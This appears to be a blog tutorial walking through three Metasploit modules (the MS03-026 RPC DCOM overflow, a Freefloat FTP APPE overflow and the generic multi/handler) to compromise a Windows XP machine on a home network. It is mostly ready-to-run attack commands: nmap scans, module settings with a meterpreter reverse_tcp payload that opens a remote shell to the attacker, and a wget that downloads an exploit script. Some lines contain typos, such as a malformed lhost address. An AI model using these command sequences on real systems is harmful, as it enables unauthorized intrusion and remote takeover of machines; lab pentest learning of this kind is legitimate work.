Linux

Top 3 Exploit Modules in Metasploit for Pawning your Windows XP at Home

In this article, I will discuss about 3 Metasploit modules you can try for pentesting your Windows XP box at home. In this example, my IP address is 192.168.10.2 and the victim’s IP is 192.168.10.4.

1.  Microsoft RPC DCOM Interface Overflow > exploit/windows/dcerpc/ms03_026_dcom

MSRPC Exploit is an exploit that pawns a stack buffer overflow in the RPCSS service and is credited to Last Stage of Delirium research group. The port known for this exploit is port 135, thus before we can exploit your box we need to determine if the said port is open.

nmap 192.168.10.4

msrpc

use exploit/windows/dcerpc/ms03_026_dcom

set payload windows/meterpreter/reverse_tcp

set rhost 192.168.10.4

set lhost 192.168.102

set lport 4444

exploit

ms03_026_dcom

2. Freefloat FTP Server APPE Command Overflow > exploit/windows/ftp/freefloat_ftp_apee_cmd

The Freefloat FTP Server APPE Command Overflow used to be a 0-day exploit last year and that this Metasploit module was made by SecPod.

In order to run the module we need to download the ruby script first and put it in this directory : /opt/framework/msf3/modules/exploits/windows/ftp (BackTrack) or /opt/metasploit3/msf3/modules/exploits/windows/ftp (BackBox)

wget wget http://secpod.org/msf/freefloat_ftp_apee_cmd.rb

Before we can exploit your box, we need to determine if port 21 is open and if it is Freefloat FTP Server.

nmap 192.168.10.4

ftp 192.168.10.4

ftpserver

Alright, all is well and so we can already launch Metasploit 😉

use exploit/windows/ftp/freefloat_ftp_apee_cmd

set payload windows/meterpreter/reverse_tcp

set rhost 192.168.10.4

set lhost 192.168.10.2

set lport 4444

exploit

FreeFloat FTP Server Exploit

Note: You can download Freefloat for free here.

3. Generic Payload Handler > exploit/multi/handler

If you are following this blog then you might be familiar about this module which I use in pawning Windows 7 SP 1, but this module is also applicable for pentesting your Windows XP Box.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.10.2

set lport 4444 (You can use other listening ports)

exploit

reverse_handler

Leave a Reply